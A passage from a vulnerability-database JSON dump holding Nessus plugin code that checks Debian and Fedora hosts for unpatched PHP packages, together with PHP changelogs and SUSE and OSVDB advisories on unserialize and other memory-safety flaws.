or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libapache2-mod-php5\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libphp5-embed\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php-pear\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-cgi\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-cli\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-common\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-curl\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-dbg\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-dev\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-enchant\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-fpm\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-gd\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-gmp\", 
reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-imap\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-interbase\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-intl\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-ldap\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mcrypt\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mysql\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-mysqlnd\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-odbc\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-pgsql\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-pspell\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-recode\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-snmp\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-sqlite\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-sybase\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-tidy\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-xmlrpc\", reference:\"5.4.36-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"php5-xsl\", reference:\"5.4.36-0+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:20:32", "bulletinFamily": "scanner", 
"description": "18 Dec 2014, PHP 5.6.4\\\\r\\\\n\\\\r\\\\nCore:\\\\r\\\\n* Fixed bug #68091 (Some\nZend headers lack appropriate extern 'C' blocks). (Adam)\\\\r\\\\n* Fixed\nbug #68104 (Segfault while pre-evaluating a disabled function).\n(Laruence)\\\\r\\\\n* Fixed bug #68185 ('Inconsistent insteadof\ndefinition.'- incorrectly triggered). (Julien)\\\\r\\\\n* Fixed bug #68355\n(Inconsistency in example php.ini comments). (Chris McCafferty)\\\\r\\\\n*\nFixed bug #68370 ('unset($this)' can make the program crash).\n(Laruence)\\\\r\\\\n* Fixed bug #68422 (Incorrect argument reflection info\nfor array_multisort()). (Alexander Lisachenko)\\\\r\\\\n* Fixed bug #68446\n(Array constant not accepted for array parameter default). (Bob,\nDmitry)\\\\r\\\\n* Fixed bug #68545 (NULL pointer dereference in\nunserialize.c). (Anatol)\\\\r\\\\n* Fixed bug #68594 (Use after free\nvulnerability in unserialize()). (CVE-2014-8142) (Stefan\nEsser)\\\\r\\\\n\\\\r\\\\nDate:\\\\r\\\\n* Fixed day_of_week function as it could\nsometimes return negative values internally.\n(Derick)\\\\r\\\\n\\\\r\\\\nFPM:\\\\r\\\\n* Fixed bug #68381 (fpm_unix_init_main\nignores log_level). (David Zuelke, Remi)\\\\r\\\\n* Fixed bug #68420\n(listen=9000 listens to ipv6 localhost instead of all addresses).\n(Remi)\\\\r\\\\n* Fixed bug #68421 (access.format='%R' doesn't log ipv6\naddress). (Remi)\\\\r\\\\n* Fixed bug #68423 (PHP-FPM will no longer load\nall pools). (Remi)\\\\r\\\\n* Fixed bug #68428 (listen.allowed_clients is\nIPv4 only). (Remi)\\\\r\\\\n* Fixed bug #68452 (php-fpm man page is\noudated). (Remi)\\\\r\\\\n* Fixed request #68458 (Change pm.start_servers\ndefault warning to notice). (David Zuelke, Remi)\\\\r\\\\n* Fixed bug\n#68463 (listen.allowed_clients can silently result in no allowed\naccess). (Remi)\\\\r\\\\n* Fixed request #68391 (php-fpm conf files\nloading order). (Florian Margaine, Remi)\\\\r\\\\n* Fixed bug #68478\n(access.log don't use prefix). 
(Remi)\\\\r\\\\n\\\\r\\\\nGMP:\\\\r\\\\n* Fixed bug\n#68419 (build error with gmp 4.1). (Remi)\\\\r\\\\n\\\\r\\\\nMcrypt:\\\\r\\\\n*\nFixed possible read after end of buffer and use after free.\n(Dmitry)\\\\r\\\\n\\\\r\\\\nPDO_pgsql:\\\\r\\\\n* Fixed bug #67462\n(PDO_PGSQL::beginTransaction() wrongly throws exception when not in\ntransaction) (Matteo)\\\\r\\\\n* Fixed bug #68351 (PDO::PARAM_BOOL and\nATTR_EMULATE_PREPARES misbehaving) (Matteo)\\\\r\\\\n\\\\r\\\\nSession:\\\\r\\\\n*\nFixed bug #68331 (Session custom storage callable functions not being\ncalled) (Yasuo Ohgaki)\\\\r\\\\n\\\\r\\\\nSOAP:\\\\r\\\\n* Fixed bug #68361\n(Segmentation fault on SoapClient::__getTypes).\n(Laruence)\\\\r\\\\n\\\\r\\\\nzlib:\\\\r\\\\n* Fixed bug #53829 (Compiling PHP\nwith large file support will replace function gzopen by gzopen64)\n(Sascha Kettler, Matteo)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2015-10-19T00:00:00", "published": "2014-12-30T00:00:00", "id": "FEDORA_2014-17241.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80291", "title": "Fedora 21 : php-5.6.4-2.fc21 (2014-17241)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17241.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80291);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:23:31 $\");\n\n script_cve_id(\"CVE-2014-8142\");\n script_bugtraq_id(71791);\n script_xref(name:\"FEDORA\", value:\"2014-17241\");\n\n script_name(english:\"Fedora 21 : php-5.6.4-2.fc21 (2014-17241)\");\n script_summary(english:\"Checks rpm output for the updated 
package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"18 Dec 2014, PHP 5.6.4\\\\r\\\\n\\\\r\\\\nCore:\\\\r\\\\n* Fixed bug #68091 (Some\nZend headers lack appropriate extern 'C' blocks). (Adam)\\\\r\\\\n* Fixed\nbug #68104 (Segfault while pre-evaluating a disabled function).\n(Laruence)\\\\r\\\\n* Fixed bug #68185 ('Inconsistent insteadof\ndefinition.'- incorrectly triggered). (Julien)\\\\r\\\\n* Fixed bug #68355\n(Inconsistency in example php.ini comments). (Chris McCafferty)\\\\r\\\\n*\nFixed bug #68370 ('unset($this)' can make the program crash).\n(Laruence)\\\\r\\\\n* Fixed bug #68422 (Incorrect argument reflection info\nfor array_multisort()). (Alexander Lisachenko)\\\\r\\\\n* Fixed bug #68446\n(Array constant not accepted for array parameter default). (Bob,\nDmitry)\\\\r\\\\n* Fixed bug #68545 (NULL pointer dereference in\nunserialize.c). (Anatol)\\\\r\\\\n* Fixed bug #68594 (Use after free\nvulnerability in unserialize()). (CVE-2014-8142) (Stefan\nEsser)\\\\r\\\\n\\\\r\\\\nDate:\\\\r\\\\n* Fixed day_of_week function as it could\nsometimes return negative values internally.\n(Derick)\\\\r\\\\n\\\\r\\\\nFPM:\\\\r\\\\n* Fixed bug #68381 (fpm_unix_init_main\nignores log_level). (David Zuelke, Remi)\\\\r\\\\n* Fixed bug #68420\n(listen=9000 listens to ipv6 localhost instead of all addresses).\n(Remi)\\\\r\\\\n* Fixed bug #68421 (access.format='%R' doesn't log ipv6\naddress). (Remi)\\\\r\\\\n* Fixed bug #68423 (PHP-FPM will no longer load\nall pools). (Remi)\\\\r\\\\n* Fixed bug #68428 (listen.allowed_clients is\nIPv4 only). (Remi)\\\\r\\\\n* Fixed bug #68452 (php-fpm man page is\noudated). (Remi)\\\\r\\\\n* Fixed request #68458 (Change pm.start_servers\ndefault warning to notice). (David Zuelke, Remi)\\\\r\\\\n* Fixed bug\n#68463 (listen.allowed_clients can silently result in no allowed\naccess). 
(Remi)\\\\r\\\\n* Fixed request #68391 (php-fpm conf files\nloading order). (Florian Margaine, Remi)\\\\r\\\\n* Fixed bug #68478\n(access.log don't use prefix). (Remi)\\\\r\\\\n\\\\r\\\\nGMP:\\\\r\\\\n* Fixed bug\n#68419 (build error with gmp 4.1). (Remi)\\\\r\\\\n\\\\r\\\\nMcrypt:\\\\r\\\\n*\nFixed possible read after end of buffer and use after free.\n(Dmitry)\\\\r\\\\n\\\\r\\\\nPDO_pgsql:\\\\r\\\\n* Fixed bug #67462\n(PDO_PGSQL::beginTransaction() wrongly throws exception when not in\ntransaction) (Matteo)\\\\r\\\\n* Fixed bug #68351 (PDO::PARAM_BOOL and\nATTR_EMULATE_PREPARES misbehaving) (Matteo)\\\\r\\\\n\\\\r\\\\nSession:\\\\r\\\\n*\nFixed bug #68331 (Session custom storage callable functions not being\ncalled) (Yasuo Ohgaki)\\\\r\\\\n\\\\r\\\\nSOAP:\\\\r\\\\n* Fixed bug #68361\n(Segmentation fault on SoapClient::__getTypes).\n(Laruence)\\\\r\\\\n\\\\r\\\\nzlib:\\\\r\\\\n* Fixed bug #53829 (Compiling PHP\nwith large file support will replace function gzopen by gzopen64)\n(Sascha Kettler, Matteo)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1175718\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147131.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?98b77dc7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release 
([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"php-5.6.4-2.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:20:32", "bulletinFamily": "scanner", "description": "18 Dec 2014, PHP 5.5.20\\r\\n\\r\\nCore:\\r\\n* Fixed bug #68091 (Some Zend\nheaders lack appropriate extern 'C' blocks). (Adam)\\r\\n* Fixed bug\n#68185 ('Inconsistent insteadof definition.'- incorrectly triggered).\n(Julien)\\r\\n* Fixed bug #68370 ('unset($this)' can make the program\ncrash). (Laruence)\\r\\n* Fixed bug #68545 (NULL pointer dereference in\nunserialize.c). (Anatol)\\r\\n* Fixed bug #68594 (Use after free\nvulnerability in unserialize()). (CVE-2014-8142) (Stefan\nEsser)\\r\\n\\r\\nDate:\\r\\n* Fixed day_of_week function as it could\nsometimes return negative values internally. (Derick)\\r\\n\\r\\nFPM:\\r\\n*\nFixed bug #68381 (fpm_unix_init_main ignores log_level). (David\nZuelke, Remi)\\r\\n* Fixed bug #68420 (listen=9000 listens to ipv6\nlocalhost instead of all addresses). (Remi)\\r\\n* Fixed bug #68421\n(access.format='%R' doesn't log ipv6 address). 
(Remi)\\r\\n* Fixed bug\n#68423 (PHP-FPM will no longer load all pools). (Remi)\\r\\n* Fixed bug\n#68428 (listen.allowed_clients is IPv4 only). (Remi)\\r\\n* Fixed bug\n#68452 (php-fpm man page is oudated). (Remi)\\r\\n* Fixed request #68458\n(Change pm.start_servers default warning to notice). (David Zuelke,\nRemi)\\r\\n* Fixed bug #68463 (listen.allowed_clients can silently\nresult in no allowed access). (Remi)\\r\\n* Fixed request #68391\n(php-fpm conf files loading order). (Florian Margaine, Remi)\\r\\n*\nFixed bug #68478 (access.log don't use prefix).\n(Remi)\\r\\n\\r\\nMcrypt:\\r\\n* Fixed possible read after end of buffer and\nuse after free. (Dmitry)\\r\\n\\r\\nPDO_pgsql:\\r\\n* Fixed bug #66584\n(Segmentation fault on statement deallocation) (Matteo)\\r\\n* Fixed bug\n#67462 (PDO_PGSQL::beginTransaction() wrongly throws exception when\nnot in transaction) (Matteo)\\r\\n* Fixed bug #68351 (PDO::PARAM_BOOL\nand ATTR_EMULATE_PREPARES misbehaving) (Matteo)\\r\\n\\r\\nzlib:\\r\\n*\nFixed bug #53829 (Compiling PHP with large file support will replace\nfunction gzopen by gzopen64) (Sascha Kettler, Matteo)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2015-10-19T00:00:00", "published": "2014-12-30T00:00:00", "id": "FEDORA_2014-17276.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80296", "title": "Fedora 19 : php-5.5.20-2.fc19 (2014-17276)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17276.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80296);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:23:31 $\");\n\n script_cve_id(\"CVE-2014-8142\");\n script_bugtraq_id(71791);\n script_xref(name:\"FEDORA\", value:\"2014-17276\");\n\n script_name(english:\"Fedora 19 : php-5.5.20-2.fc19 (2014-17276)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"18 Dec 2014, PHP 5.5.20\\r\\n\\r\\nCore:\\r\\n* Fixed bug #68091 (Some Zend\nheaders lack appropriate extern 'C' blocks). (Adam)\\r\\n* Fixed bug\n#68185 ('Inconsistent insteadof definition.'- incorrectly triggered).\n(Julien)\\r\\n* Fixed bug #68370 ('unset($this)' can make the program\ncrash). (Laruence)\\r\\n* Fixed bug #68545 (NULL pointer dereference in\nunserialize.c). (Anatol)\\r\\n* Fixed bug #68594 (Use after free\nvulnerability in unserialize()). (CVE-2014-8142) (Stefan\nEsser)\\r\\n\\r\\nDate:\\r\\n* Fixed day_of_week function as it could\nsometimes return negative values internally. (Derick)\\r\\n\\r\\nFPM:\\r\\n*\nFixed bug #68381 (fpm_unix_init_main ignores log_level). (David\nZuelke, Remi)\\r\\n* Fixed bug #68420 (listen=9000 listens to ipv6\nlocalhost instead of all addresses). 
(Remi)\\r\\n* Fixed bug #68421\n(access.format='%R' doesn't log ipv6 address). (Remi)\\r\\n* Fixed bug\n#68423 (PHP-FPM will no longer load all pools). (Remi)\\r\\n* Fixed bug\n#68428 (listen.allowed_clients is IPv4 only). (Remi)\\r\\n* Fixed bug\n#68452 (php-fpm man page is oudated). (Remi)\\r\\n* Fixed request #68458\n(Change pm.start_servers default warning to notice). (David Zuelke,\nRemi)\\r\\n* Fixed bug #68463 (listen.allowed_clients can silently\nresult in no allowed access). (Remi)\\r\\n* Fixed request #68391\n(php-fpm conf files loading order). (Florian Margaine, Remi)\\r\\n*\nFixed bug #68478 (access.log don't use prefix).\n(Remi)\\r\\n\\r\\nMcrypt:\\r\\n* Fixed possible read after end of buffer and\nuse after free. (Dmitry)\\r\\n\\r\\nPDO_pgsql:\\r\\n* Fixed bug #66584\n(Segmentation fault on statement deallocation) (Matteo)\\r\\n* Fixed bug\n#67462 (PDO_PGSQL::beginTransaction() wrongly throws exception when\nnot in transaction) (Matteo)\\r\\n* Fixed bug #68351 (PDO::PARAM_BOOL\nand ATTR_EMULATE_PREPARES misbehaving) (Matteo)\\r\\n\\r\\nzlib:\\r\\n*\nFixed bug #53829 (Compiling PHP with large file support will replace\nfunction gzopen by gzopen64) (Sascha Kettler, Matteo)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1175718\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147123.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7f81a5b7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release 
([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"php-5.5.20-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T11:42:02", "bulletinFamily": "unix", "description": "php5 was updated to fix four security issues.\n\n These security issues were fixed:\n - CVE-2015-0231: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x\n before 5.5.21, and 5.6.x before 5.6.5 allowed remote attackers to\n execute arbitrary code via a crafted unserialize call that leverages\n improper handling of duplicate numerical keys within the serialized\n properties of an object. 
NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2014-8142 (bnc#910659).\n - CVE-2014-9427: sapi/cgi/cgi_main.c in the CGI component in PHP through\n 5.4.36, 5.5.x through 5.5.20, and 5.6.x through 5.6.4, when mmap is used\n to read a .php file, did not properly consider the mapping's length\n during processing of an invalid file that begins with a # character and\n lacks a newline character, which caused an out-of-bounds read and might\n (1) allow remote attackers to obtain sensitive information from php-cgi\n process memory by leveraging the ability to upload a .php file or (2)\n trigger unexpected code execution if a valid PHP script is present in\n memory locations adjacent to the mapping (bnc#911664).\n - CVE-2015-0232: The exif_process_unicode function in ext/exif/exif.c in\n PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allowed\n remote attackers to execute arbitrary code or cause a denial of service\n (uninitialized pointer free and application crash) via crafted EXIF data\n in a JPEG image (bnc#914690).\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x\n before 5.5.20, and 5.6.x before 5.6.4 allowed remote attackers to\n execute arbitrary code via a crafted unserialize call that leverages\n improper handling of duplicate keys within the serialized properties of\n an object, a different vulnerability than CVE-2004-1019 (bnc#910659).\n\n Additionally a fix was included that protects against a possible NULL\n pointer use (bnc#910659).\n\n This non-security issue was fixed:\n - php53 ignored default_socket_timeout on outgoing SSL connection\n (bnc#907519).\n\n", "modified": "2015-02-24T11:05:36", "published": "2015-02-24T11:05:36", "id": "SUSE-SU-2015:0365-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00029.html", "title": "Security update for php5 (important)", "type": "suse", "cvss": 
{"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:41:56", "bulletinFamily": "unix", "description": "PHP is a well known, widely-used scripting language often used within web server setups.\n#### Solution\nThere is no workaround known besides disabling PHP. Therefore we recommend to install the updated packages.", "modified": "2005-01-17T17:12:32", "published": "2005-01-17T17:12:32", "id": "SUSE-SA:2005:002", "href": "http://lists.opensuse.org/opensuse-security-announce/2005-01/msg00010.html", "title": "remote code execution in php4, mod_php4", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:08", "bulletinFamily": "software", "description": "## Vulnerability Description\nPHP contains a flaw that may allow a remote attacker to gain elevated privileges. The issue is due to the deserialization code not properly sanitizing user-supplied input. This may allow an attacker to pass crafted content to the unserialize function and cause a denial of service or execute arbitrary code.\n## Solution Description\nUpgrade to version 4.3.10 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHP contains a flaw that may allow a remote attacker to gain elevated privileges. The issue is due to the deserialization code not properly sanitizing user-supplied input. 
This may allow an attacker to pass crafted content to the unserialize function and cause a denial of service or execute arbitrary code.\n## References:\nVendor URL: http://www.php.net/\nVendor Specific News/Changelog Entry: http://www.php.net/release_4_3_10.php\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=300770)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\n[Vendor Specific Advisory URL](http://itrc.hp.com/service/cki/docDisplay.do?docId=HPSBMA01212)\n[Secunia Advisory ID:13481](https://secuniaresearch.flexerasoftware.com/advisories/13481/)\n[Secunia Advisory ID:13851](https://secuniaresearch.flexerasoftware.com/advisories/13851/)\n[Secunia Advisory ID:13923](https://secuniaresearch.flexerasoftware.com/advisories/13923/)\n[Secunia Advisory ID:17311](https://secuniaresearch.flexerasoftware.com/advisories/17311/)\n[Secunia Advisory ID:13562](https://secuniaresearch.flexerasoftware.com/advisories/13562/)\n[Secunia Advisory ID:13944](https://secuniaresearch.flexerasoftware.com/advisories/13944/)\n[Secunia Advisory ID:16322](https://secuniaresearch.flexerasoftware.com/advisories/16322/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:13568](https://secuniaresearch.flexerasoftware.com/advisories/13568/)\n[Secunia Advisory ID:13611](https://secuniaresearch.flexerasoftware.com/advisories/13611/)\n[Secunia Advisory ID:13895](https://secuniaresearch.flexerasoftware.com/advisories/13895/)\n[Related OSVDB ID: 12411](https://vulners.com/osvdb/OSVDB:12411)\n[Related OSVDB ID: 